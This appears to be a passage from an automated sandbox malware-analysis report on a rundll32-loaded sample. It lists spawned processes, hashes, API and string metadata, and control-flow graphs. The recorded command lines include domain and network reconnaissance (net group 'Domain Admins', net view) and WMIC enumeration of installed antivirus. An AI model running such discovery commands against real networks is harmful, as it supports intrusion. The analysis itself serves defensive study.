                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:27
                                                                                                                                Start time:11:57:09
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:net view /all
                                                                                                                                Imagebase:0x7ff645da0000
                                                                                                                                File size:59'904 bytes
                                                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:28
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:/c net group "Domain Admins" /domain
                                                                                                                                Imagebase:0x7ff790790000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:29
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:30
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:net group "Domain Admins" /domain
                                                                                                                                Imagebase:
                                                                                                                                File size:59'904 bytes
                                                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:31
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\net1.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:C:\Windows\system32\net1 group "Domain Admins" /domain
                                                                                                                                Imagebase:
                                                                                                                                File size:183'808 bytes
                                                                                                                                MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:32
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:/Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                                                                                                                                Imagebase:
                                                                                                                                File size:576'000 bytes
                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:33
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:34
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:/c net config workstation
                                                                                                                                Imagebase:
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:35
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:36
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:net config workstation
                                                                                                                                Imagebase:
                                                                                                                                File size:59'904 bytes
                                                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:37
                                                                                                                                Start time:11:57:22
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\net1.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:C:\Windows\system32\net1 config workstation
                                                                                                                                Imagebase:
                                                                                                                                File size:183'808 bytes
                                                                                                                                MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:38
                                                                                                                                Start time:11:57:23
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:/c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                                                                                                                                Imagebase:
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:39
                                                                                                                                Start time:11:57:23
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:40
                                                                                                                                Start time:11:57:23
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
                                                                                                                                Imagebase:
                                                                                                                                File size:576'000 bytes
                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:41
                                                                                                                                Start time:11:57:23
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:findstr /V /B /C:displayName
                                                                                                                                Imagebase:
                                                                                                                                File size:36'352 bytes
                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false


                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:0.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:98.2%
                                                                                                                                  Signature Coverage:18.6%
                                                                                                                                  Total number of Nodes:226
                                                                                                                                  Total number of Limit Nodes:6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.2412276165.00007DF496590000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF496590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_7df496590000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateSnapshotToolhelp32
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 3332741929-2766056989
                                                                                                                                  • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                  • Instruction ID: ec187bbac26670864484b36c357e7c8e44bf3f94dbc9e4d3789add524fdda48e
                                                                                                                                  • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                  • Instruction Fuzzy Hash: F571F03160494C8FEF94EF6CD848BA937E1FB98365F50462AE81EC72A0DB74D954CB80
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.2412276165.00007DF496590000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF496590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_7df496590000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2353314856-0
                                                                                                                                  • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                  • Instruction ID: b40be1f42a36e4ead5d007aa360b35f4b26dec9c6396a70d7593ab29803aa538
                                                                                                                                  • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                  • Instruction Fuzzy Hash: 4521BC3071494C8FEBA1EF5CD858BEA33E1EB98320F40422AD41EDB290DE359A448750

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 145 7ffd92dca250-7ffd92dca270 146 7ffd92dca273-7ffd92dca2e1 145->146 149 7ffd92dca2e2-7ffd92dca2ed 146->149 149->149 150 7ffd92dca2ef-7ffd92dca2fc 149->150 150->146 151 7ffd92dca302-7ffd92dca35d 150->151
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID: +=
                                                                                                                                  • API String ID: 4275171209-1123256139
                                                                                                                                  • Opcode ID: 97e9a56a448ecaa7363e47874dce10fabfe0d6ccf1fb59d6a2af93f8f1d517d2
                                                                                                                                  • Instruction ID: a5afb22cb88eeb290df7999dee5b6a868f47fc1c8660f21ee825c4601b754c91
                                                                                                                                  • Opcode Fuzzy Hash: 97e9a56a448ecaa7363e47874dce10fabfe0d6ccf1fb59d6a2af93f8f1d517d2
                                                                                                                                  • Instruction Fuzzy Hash: 43C1ADE37613683AFD1B86A67E16FAD94025B52BF5C5093317D390ABCAF13C68CB8540

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 156 7ffd92dca3c0-7ffd92dca69e VirtualAlloc
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 8cb194e6ffdbc4f4ebece6793a7d4bb003f80c8fce03c4cbf3f4b683e7597c4b
                                                                                                                                  • Instruction ID: 389feeaa012dc3922a08e29dc5e6084110eacfa6bf5b45f30e8ddc8a16230d29
                                                                                                                                  • Opcode Fuzzy Hash: 8cb194e6ffdbc4f4ebece6793a7d4bb003f80c8fce03c4cbf3f4b683e7597c4b
                                                                                                                                  • Instruction Fuzzy Hash: A751D2E3B713582AF91B86AA7D16FAD90029B52BF5C5493317D3906BCAF13C68CB8540

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 158 7ffd92dca4c0-7ffd92dca69e VirtualAlloc
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 0d2d5d6dfa6f50465e0a3596790292fef24e24249b2b6cf750ec3e9fa2e6afe6
                                                                                                                                  • Instruction ID: 6a5f8257ce671462ed7a5e973fb7f74aa322d97e317348862fb750fc507a4fc4
                                                                                                                                  • Opcode Fuzzy Hash: 0d2d5d6dfa6f50465e0a3596790292fef24e24249b2b6cf750ec3e9fa2e6afe6
                                                                                                                                  • Instruction Fuzzy Hash: 6F2102E3B603183BF91B86BA3D12FBD50029B52BF5C50A3217D3916BC6E13C69CB8640
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.2186898111.000001DA03160000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DA03160000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_1da03160000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d7e753f29fc521fa2d0b6c7a6994e588844e22f1070003091da851a212630d82
                                                                                                                                  • Instruction ID: 42fd085fa24732cb5e5746ad1bc58dc9668683d05e20af23999916fc2571c101
                                                                                                                                  • Opcode Fuzzy Hash: d7e753f29fc521fa2d0b6c7a6994e588844e22f1070003091da851a212630d82
                                                                                                                                  • Instruction Fuzzy Hash: EEF08170628B408BE744DF18848967677E1FB9C755F64452FF88A87361CB3598428B43
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.2186898111.000001DA03160000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DA03160000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_1da03160000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c03d8a45eb9b0d3ccc835ff03553e770b46152858ebd01b16508ffef1a6f20c3
                                                                                                                                  • Instruction ID: 64398325787a1d522fcd83cdd95f9caf8b04510a30ee92bc71944dce18a02d21
                                                                                                                                  • Opcode Fuzzy Hash: c03d8a45eb9b0d3ccc835ff03553e770b46152858ebd01b16508ffef1a6f20c3
                                                                                                                                  • Instruction Fuzzy Hash: 92F05470A28F444BDB08EF2C888A67577E1FBAC745F54462FA449C7361DB35E5428B83

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 1800026c0-18000280b call 180002cb0 call 18002f4a0 * 3 GetModuleFileNameW SHGetSpecialFolderPathW lstrcatW * 4 call 180005f70 10 180002810-180002858 call 1800051b0 call 180005250 0->10 15 18000285a-180002872 10->15 16 180002880-180002885 10->16 17 180002874 15->17 18 180002877-18000287f call 1800023f0 15->18 19 180002ac1-180002ace call 180005360 16->19 20 18000288b-1800028ab call 180006a80 call 180003260 16->20 17->18 18->16 28 180002af7-180002b5d call 1800038d0 call 180007928 19->28 29 180002ad0-180002ae9 19->29 36 1800028ad 20->36 37 1800028b0-1800028c6 call 180006db0 20->37 45 180002b6b-180002b92 call 18002cc10 28->45 46 180002b5f-180002b66 call 18002e8fc 28->46 32 180002aeb 29->32 33 180002aee-180002af6 call 1800023f0 29->33 32->33 33->28 36->37 43 1800028d1-1800028fa call 180006db0 37->43 44 1800028c8-1800028cc call 18002e8fc 37->44 53 180002901-18000290c 43->53 54 1800028fc-1800028ff 43->54 44->43 46->45 56 180002910-180002919 53->56 55 18000291b-18000293f call 1800062f0 call 180003260 54->55 61 180002941 55->61 62 180002944-18000295a call 180006db0 55->62 56->55 56->56 61->62 65 180002965-18000297d 62->65 66 18000295c-180002960 call 18002e8fc 62->66 68 180002988-1800029d3 call 180006db0 call 1800062f0 call 180003260 65->68 69 18000297f-180002983 call 18002e8fc 65->69 66->65 77 1800029d5 68->77 78 1800029d8-1800029ee call 180006db0 68->78 69->68 77->78 81 1800029f9-180002a11 78->81 82 1800029f0-1800029f4 call 18002e8fc 78->82 84 180002a13-180002a17 call 18002e8fc 81->84 85 180002a1c-180002a67 call 180006db0 call 1800062f0 call 180003260 81->85 82->81 84->85 93 180002a69 85->93 94 180002a6c-180002a82 call 180006db0 85->94 93->94 97 180002a84-180002a88 call 18002e8fc 94->97 98 180002a8d-180002aa5 94->98 97->98 100 180002aa7-180002aab call 18002e8fc 98->100 101 180002ab0-180002abc call 180006db0 98->101 100->101 101->19
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$FileModuleName$FolderIos_base_dtorPathSpecialstd::ios_base::_
                                                                                                                                  • String ID: GfeXcodeFunc$\NTUSER.DAT.Not
                                                                                                                                  • API String ID: 2606783807-3673055099
                                                                                                                                  • Opcode ID: f4fb330f2fce6a57cdb251511d5a633e98aa520d2ba9185056906fd6c2a3254f
                                                                                                                                  • Instruction ID: 5b91f0b68c497ecbefdd096ad22c36a01d1dfa7b74f7b8fae1d4cb91b2026b10
                                                                                                                                  • Opcode Fuzzy Hash: f4fb330f2fce6a57cdb251511d5a633e98aa520d2ba9185056906fd6c2a3254f
                                                                                                                                  • Instruction Fuzzy Hash: 0EE15B32224B8989EBA1DF24D8943DD3761F7897C8F809126F64D47AA9DF74C64DC740

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4592950432.000001DA01410000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DA01410000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_1da01410000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.2186898111.000001DA03160000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DA03160000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_1da03160000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 0-3916222277

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 152 180002c30-180002c79 VirtualAllocExNuma 153 180002c80-180002c98 152->153 153->153 154 180002c9a-180002ca2 153->154
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocNumaVirtual
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 4233825816-2766056989

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 159 7ffd92dca5a0-7ffd92dca60f VirtualAlloc
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryLocalSystem$AllocErrorFreeLastLibraryLoad$FileModuleName
                                                                                                                                  • String ID: \mfpmp.exe$cryptbase.dll$cryptnet.dll$devobj.dll$drvstore.dll$msasn1.dll$wldp.dll
                                                                                                                                  • API String ID: 1091566109-3852175644
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %s - CreateFormatConverter failed with %x error,$%s - DirectBlend object not ready, returning error,$%s - Invalid Params, image width - %x, Image height - %x greater than specified desitnation width - %x or destination height - %x,$%s - QI on IDXGISurface failed, error - %x$%s - allocResources failed with %x error,$%s Notable to allocate memory for up, returning error$%s: Surface didnt return a QI to a ID3D11Texture2D surface $%s: handleSurfaceBlt failed for source surface from D2D bitmap, error - %x $/tEXt/Software$/tEXt/SubType$After WriteSource$Before WriteSource$CNvWICImageTranscoderEx::performImageTransform$CNvWICImageTranscoderEx::performImageTransform$CreateDecoderFromFilename failed with %x error$Exit performImageTransform$Failed to delete 0KB file$GEFORCE SHARE$GetColorContexts failed with %x error$GetContainerFormat returned GUID for input image- {%08lX-%04hX-%04hX-%02hhX%02hhX-%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX} for Frame:$GetSize on the decoder object failed with %x error$NGXSuperResolution$No input file specified$Not initialized$Unable to copy color contexts failed with %x error$m_pEncoder CreateNewFrame failed with %x error$pBitmapFrameEncode->Commit failed with %x error$pBitmapFrameEncode->GetMetadataQueryWriter failed with %x error$pBitmapFrameEncode->Initialize failed with %x error$pBitmapFrameEncode->WriteSource failed with %x error
                                                                                                                                  • API String ID: 0-3877869248
                                                                                                                                  • Opcode ID: e9d8d0fb7bf29b4403d324951166c1d39d0a5a177f2d19678a834bbb287def2f
                                                                                                                                  • Instruction ID: 7b00f0fd76fb4f942b32aac610c5ac4d3b6ef8878e034a1131b0d1e251aa45d2
                                                                                                                                  • Opcode Fuzzy Hash: e9d8d0fb7bf29b4403d324951166c1d39d0a5a177f2d19678a834bbb287def2f
                                                                                                                                  • Instruction Fuzzy Hash: 15C23876709B8686EB70CF99E4A47AA73A4FB88B85F004136CA8D47B64DF7DD444DB00

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Event$ClearCloseHandleObjectPropSingleVariantWait
                                                                                                                                  • String ID: $%s - time-taken for Flush: %lf mecs, transcoded %d frames$%s - time-taken for ReadSample(decode): %lf mecs, transcoded %d frames$%s: CreateGifEncoder failed with error - %x$%s: GetVideoFormat failed with error - %x, possibly invalid video stream$%s: HandleConversion routine failed. Error - %x$%s: InitializeTranscodeState done successfully, ready for transcode$%s: InitializeTranscodeState returned error - %x, returning error$%s: MF_SOURCE_READERF_CURRENTMEDIATYPECHANGED recieved for video stream$%s: Main processing thread finished processing, hr value - %x$%s: Not able to create system memory buffer. Error - %x$%s: Transcode operation failed. Error - %x$%s: Video stream Format Width - 0x%x, Height - 0x%x, Sample width - 0x%x, Sample height - 0x%x$%s: failed to create encoder object$%s: failed to initialize encoder object$%s: flushandReleaseEncoder failed, Error - %x$%s:FlushGif failed with %x return value$%s:WaitForSingleObject for thread handle failed with %x return value$:pSampleTmp NULL, possibly EOS$CNvVideoTranscode::CreateGifEncoder$CNvVideoTranscode::FlushGif$CNvVideoTranscode::TranscodeVideo$End of Stream$Maximum Frame Count as specified - %d, reached$No sample
                                                                                                                                  • API String ID: 148790452-735870442
                                                                                                                                  • Opcode ID: f344703b25434339ed57f5c68d3d14fce1a39faf7061b5202ae6c44010f9219a
                                                                                                                                  • Instruction ID: 7f0afc5ab7f4553a86eaf1e7ce97d0a08d7199c112a0e5bd2c2f75a25f1c5d8d
                                                                                                                                  • Opcode Fuzzy Hash: f344703b25434339ed57f5c68d3d14fce1a39faf7061b5202ae6c44010f9219a
                                                                                                                                  • Instruction Fuzzy Hash: FB328076B08B4282FB308FA5E4A03A92764FB84B89F444136DE4D6BB98DF7DE405C750
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ConditionInfoMaskVerifyVersion
                                                                                                                                  • String ID: CertCloseStore$CertFindCertificateInStore$CertFreeCertificateContext$CertGetIssuerCertificateFromStore$CertGetNameStringA$CryptDecodeObjectEx$CryptMsgClose$CryptMsgGetParam$CryptQueryObject$WTHelperGetProvCertFromChain$WTHelperGetProvSignerFromChain$WTHelperProvDataFromStateData$WinVerifyTrust$crypt32.dll$wintrust.dll
                                                                                                                                  • API String ID: 1813986628-3512795598
                                                                                                                                  • Opcode ID: 25b3f02b4c43d9b760aa53d465be3eafec4f552b3dd47f5ff796ec9f328cbd36
                                                                                                                                  • Instruction ID: b05d119dfedef627ec0027b8a9d6ab21bebd1a9b522edd6049dbb638c683e745
